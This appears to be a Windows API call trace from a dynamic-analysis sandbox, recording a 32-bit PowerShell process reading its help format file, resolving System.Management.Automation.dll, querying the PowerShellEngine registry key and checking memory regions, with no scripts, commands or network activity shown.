	[0160.974] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.974] GetLastError () returned 0x0
	[0160.974] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.975] GetLastError () returned 0x0
	[0160.975] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.975] GetLastError () returned 0x0
	[0160.975] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.975] GetLastError () returned 0x0
	[0160.975] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.975] GetLastError () returned 0x0
	[0160.975] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.975] GetLastError () returned 0x0
	[0160.976] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0160.976] GetLastError () returned 0x0
	[0160.976] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0xf37, lpOverlapped=0x0) returned 1
	[0160.976] GetLastError () returned 0x0
	[0160.976] ReadFile (in: hFile=0x348, lpBuffer=0x2d33013, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d33013*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0160.976] GetLastError () returned 0x0
	[0160.976] ReadFile (in: hFile=0x348, lpBuffer=0x2d3393c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2d3393c*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0160.976] GetLastError () returned 0x0
	[0160.976] CloseHandle (hObject=0x348) returned 1
	[0160.977] GetLastError () returned 0x0
	[0160.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0160.977] GetLastError () returned 0x0
	[0160.977] SetErrorMode (uMode=0x1) returned 0x1
	[0160.977] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d54938 | out: lpFileInformation=0x2d54938*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0160.977] GetLastError () returned 0x0
	[0160.977] SetErrorMode (uMode=0x1) returned 0x1
	[0161.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.200] GetLastError () returned 0x0
	[0161.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0161.200] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0161.201] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0161.201] RegCloseKey (hKey=0x348) returned 0x0
	[0161.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.201] GetLastError () returned 0x0
	[0161.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0161.201] GetLastError () returned 0x0
	[0161.213] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x10cffc61, Data2=0x7eff, Data3=0x4a31, Data4=([0]=0x93, [1]=0x83, [2]=0x2d, [3]=0xdb, [4]=0x4, [5]=0x5f, [6]=0x36, [7]=0xe0))) returned 0x0
	[0161.213] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x83247068, Data2=0x7c35, Data3=0x435e, Data4=([0]=0xbf, [1]=0x2b, [2]=0x25, [3]=0x79, [4]=0x9, [5]=0x8e, [6]=0xd9, [7]=0x27))) returned 0x0
	[0161.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.213] GetLastError () returned 0x0
	[0161.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.213] GetLastError () returned 0x0
	[0161.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.213] GetLastError () returned 0x0
	[0161.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.214] GetLastError () returned 0x0
	[0161.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.798] GetLastError () returned 0x0
	[0161.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.798] GetLastError () returned 0x0
	[0161.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.798] GetLastError () returned 0x0
	[0161.799] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1ea29c08, Data2=0x99d6, Data3=0x4137, Data4=([0]=0xbf, [1]=0xfa, [2]=0x37, [3]=0x67, [4]=0x52, [5]=0x7c, [6]=0xc7, [7]=0xc8))) returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dd18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dcc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.799] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.800] GetLastError () returned 0x0
	[0161.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.801] GetLastError () returned 0x0
	[0161.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.801] GetLastError () returned 0x0
	[0161.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.801] GetLastError () returned 0x0
	[0161.802] VirtualQuery (in: lpAddress=0x10cf54, lpBuffer=0x10df54, dwLength=0x1c | out: lpBuffer=0x10df54*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.803] VirtualQuery (in: lpAddress=0x10cf90, lpBuffer=0x10df90, dwLength=0x1c | out: lpBuffer=0x10df90*(BaseAddress=0x10c000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10deb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.803] GetLastError () returned 0x0
	[0161.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.803] GetLastError () returned 0x0
	[0161.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.804] GetLastError () returned 0x0
	[0161.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.804] GetLastError () returned 0x0
	[0161.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.804] GetLastError () returned 0x0
	[0161.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.804] GetLastError () returned 0x0
	[0161.804] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.805] GetLastError () returned 0x0
	[0161.805] VirtualQuery (in: lpAddress=0x10d2c0, lpBuffer=0x10e2c0, dwLength=0x1c | out: lpBuffer=0x10e2c0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.806] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.806] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.808] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.808] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.808] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.808] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.809] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.809] VirtualQuery (in: lpAddress=0x10d258, lpBuffer=0x10e258, dwLength=0x1c | out: lpBuffer=0x10e258*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.809] VirtualQuery (in: lpAddress=0x10d294, lpBuffer=0x10e294, dwLength=0x1c | out: lpBuffer=0x10e294*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
